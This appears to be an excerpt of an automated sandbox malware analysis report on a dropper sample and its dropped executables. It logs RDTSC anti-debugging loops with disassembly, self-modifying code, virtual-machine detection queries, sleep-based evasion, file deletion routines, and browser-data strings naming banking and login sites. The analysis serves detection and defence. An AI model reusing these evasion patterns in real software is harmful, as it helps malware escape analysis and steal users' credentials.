Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 314571 second address: 31457A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 31457A second address: 3145B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F00646A437Bh 0x0000000d nop 0x0000000e sub esi, dword ptr [ebp+122D2C06h] 0x00000014 push 00000000h 0x00000016 adc dl, FFFFFF86h 0x00000019 call 00007F00646A4379h 0x0000001e jg 00007F00646A4393h 0x00000024 push eax 0x00000025 push edx 0x00000026 js 00007F00646A4376h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3145B0 second address: 3145E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007F0064E5702Eh 0x00000010 jno 00007F0064E57028h 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jp 00007F0064E57032h 0x00000020 jnl 00007F0064E5702Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3145E6 second address: 3145F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [eax] 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3145F0 second address: 31466C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007F0064E57032h 0x0000000f pop eax 0x00000010 mov edi, esi 0x00000012 push 00000003h 0x00000014 jmp 00007F0064E5702Eh 0x00000019 push 00000000h 0x0000001b sbb ecx, 3726E7A2h 0x00000021 push 00000003h 0x00000023 mov dword ptr [ebp+122D1AB2h], ebx 0x00000029 call 00007F0064E57029h 0x0000002e jmp 00007F0064E57037h 0x00000033 push eax 0x00000034 jmp 00007F0064E5702Ah 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d jno 00007F0064E57038h 0x00000043 push eax 0x00000044 push edx 0x00000045 jns 00007F0064E57026h 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 31475B second address: 3147CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F00646A4376h 0x0000000a popad 0x0000000b pop edi 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F00646A4378h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1D31h], edx 0x0000002f push 00000000h 0x00000031 jl 00007F00646A437Ch 0x00000037 mov edi, dword ptr [ebp+122D2B5Eh] 0x0000003d call 00007F00646A4379h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jmp 00007F00646A4381h 0x0000004a jmp 00007F00646A4383h 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3147CC second address: 314818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0064E57031h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 jmp 00007F0064E57036h 0x00000019 pop eax 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jno 00007F0064E57026h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 314818 second address: 314838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jl 00007F00646A4376h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jp 00007F00646A4388h 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007F00646A4376h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 314838 second address: 31483C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 314392 second address: 314443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0064E57028h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F0064E57028h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a or esi, 51595C81h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F0064E57028h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c jnc 00007F0064E57026h 0x00000052 sub dword ptr [ebp+122D1D31h], ebx 0x00000058 call 00007F0064E57029h 0x0000005d jl 00007F0064E57038h 0x00000063 push eax 0x00000064 jmp 00007F0064E57030h 0x00000069 pop eax 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e jp 00007F0064E57026h 0x00000074 jmp 00007F0064E57038h 0x00000079 popad 0x0000007a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 314443 second address: 3144EC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F00646A4380h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F00646A437Dh 0x00000013 mov eax, dword ptr [eax] 0x00000015 jbe 00007F00646A438Dh 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 jmp 00007F00646A437Fh 0x00000025 jmp 00007F00646A437Bh 0x0000002a popad 0x0000002b pop eax 0x0000002c mov ecx, dword ptr [ebp+122D2AC6h] 0x00000032 push 00000003h 0x00000034 mov esi, ecx 0x00000036 push 00000000h 0x00000038 jmp 00007F00646A4380h 0x0000003d push 00000003h 0x0000003f mov ecx, dword ptr [ebp+122D1D65h] 0x00000045 push 95F19BD3h 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F00646A4389h 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3144EC second address: 314522 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0064E5702Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 55F19BD3h 0x00000011 push esi 0x00000012 or dword ptr [ebp+122D1AB2h], ecx 0x00000018 pop edi 0x00000019 lea ebx, dword ptr [ebp+1244921Fh] 0x0000001f mov ecx, dword ptr [ebp+122D2986h] 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jnc 00007F0064E57026h 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 31457A second address: 3145B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F0064E5702Bh 0x0000000d nop 0x0000000e sub esi, dword ptr [ebp+122D2C06h] 0x00000014 push 00000000h 0x00000016 adc dl, FFFFFF86h 0x00000019 call 00007F0064E57029h 0x0000001e jg 00007F0064E57043h 0x00000024 push eax 0x00000025 push edx 0x00000026 js 00007F0064E57026h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3145B0 second address: 3145E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007F00646A437Eh 0x00000010 jno 00007F00646A4378h 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jp 00007F00646A4382h 0x00000020 jnl 00007F00646A437Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3145F0 second address: 31466C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007F00646A4382h 0x0000000f pop eax 0x00000010 mov edi, esi 0x00000012 push 00000003h 0x00000014 jmp 00007F00646A437Eh 0x00000019 push 00000000h 0x0000001b sbb ecx, 3726E7A2h 0x00000021 push 00000003h 0x00000023 mov dword ptr [ebp+122D1AB2h], ebx 0x00000029 call 00007F00646A4379h 0x0000002e jmp 00007F00646A4387h 0x00000033 push eax 0x00000034 jmp 00007F00646A437Ah 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d jno 00007F00646A4388h 0x00000043 push eax 0x00000044 push edx 0x00000045 jns 00007F00646A4376h 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 31475B second address: 3147CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0064E57026h 0x0000000a popad 0x0000000b pop edi 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F0064E57028h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1D31h], edx 0x0000002f push 00000000h 0x00000031 jl 00007F0064E5702Ch 0x00000037 mov edi, dword ptr [ebp+122D2B5Eh] 0x0000003d call 00007F0064E57029h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jmp 00007F0064E57031h 0x0000004a jmp 00007F0064E57033h 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3147CC second address: 314818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A437Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F00646A4381h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 jmp 00007F00646A4386h 0x00000019 pop eax 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jno 00007F00646A4376h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 314818 second address: 314838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jl 00007F0064E57026h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jp 00007F0064E57038h 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007F0064E57026h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 337225 second address: 337248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57039h 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F0064E57026h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3352D5 second address: 3352DF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F00646A4376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3352DF second address: 335321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0064E5702Eh 0x00000008 jns 00007F0064E57026h 0x0000000e jmp 00007F0064E57031h 0x00000013 jmp 00007F0064E57033h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 335321 second address: 335325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 335325 second address: 335353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Bh 0x00000007 jmp 00007F0064E57036h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 335353 second address: 335360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007F00646A4378h 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3354C5 second address: 3354CB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3354CB second address: 3354EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A437Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnp 00007F00646A4376h 0x00000014 popad 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3354EE second address: 3354F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 335656 second address: 33565B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 33565B second address: 335662 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 337225 second address: 337248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4389h 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F00646A4376h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3352D5 second address: 3352DF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0064E57026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3352DF second address: 335321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F00646A437Eh 0x00000008 jns 00007F00646A4376h 0x0000000e jmp 00007F00646A4381h 0x00000013 jmp 00007F00646A4383h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: C3C924 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: CC7D71 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 33C924 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 3C7D71 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Special instruction interceptor: First address: ED3B15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Special instruction interceptor: First address: ED3BBD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Special instruction interceptor: First address: 107D06A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Special instruction interceptor: First address: 10A0591 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Special instruction interceptor: First address: 10FF690 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Special instruction interceptor: First address: CC3B15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Special instruction interceptor: First address: CC3BBD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Special instruction interceptor: First address: E6D06A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Special instruction interceptor: First address: E90591 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Special instruction interceptor: First address: EEF690 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0542068B rdtsc

0_2_0542068B

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1256	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 357	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1221	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Window / User API: threadDelayed 9945	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Window / User API: foregroundWindowGot 363	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

graph_4-14964

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

API coverage: 3.2 %

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4308	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4308	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5564	Thread sleep count: 1256 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5564	Thread sleep time: -2513256s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3376	Thread sleep count: 357 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3376	Thread sleep time: -10710000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6664	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3176	Thread sleep count: 1221 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3176	Thread sleep time: -2443221s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe TID: 5352	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe TID: 5352	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe TID: 4092	Thread sleep time: -99450s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Thread sleep count: Count: 9945 delay: -10

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_0083DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_0083DBBE
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_0080C2A2 FindFirstFileExW,	8_2_0080C2A2
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_008468EE FindFirstFileW,FindClose,	8_2_008468EE
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_0084698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_0084698F
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_0083D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0083D076
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_0083D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0083D3A9
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_00849642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00849642
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_0084979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_0084979D
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_00849B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_00849B2B
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_00845C97 FindFirstFileW,FindNextFileW,FindClose,	8_2_00845C97

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_007D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_007D42DE

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: explorti.exe, explorti.exe, 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmp, 44affe150c.exe, 44affe150c.exe, 00000005.00000002.2188158622.000000000105C000.00000040.00000001.01000000.0000000A.sdmp, 4bea71e542.exe, 4bea71e542.exe, 00000006.00000002.2258291558.0000000000E4C000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Web Data.18.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Web Data.18.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: Web Data.18.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Web Data.18.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Web Data.18.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: Web Data.18.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 4bea71e542.exe, 00000006.00000002.2260142696.0000000001813000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx'
Source: explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000003.2392253412.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp, 44affe150c.exe, 00000005.00000002.2189503708.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, 4bea71e542.exe, 00000006.00000002.2260142696.000000000183E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Web Data.18.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Web Data.18.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Web Data.18.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Web Data.18.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Web Data.18.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Web Data.18.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Web Data.18.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Web Data.18.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Web Data.18.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Web Data.18.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Web Data.18.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Web Data.18.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Web Data.18.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 44affe150c.exe, 00000005.00000002.2189503708.0000000001394000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: Web Data.18.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Web Data.18.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Web Data.18.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Web Data.18.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Web Data.18.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 44affe150c.exe, 00000005.00000002.2189503708.00000000013C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWM
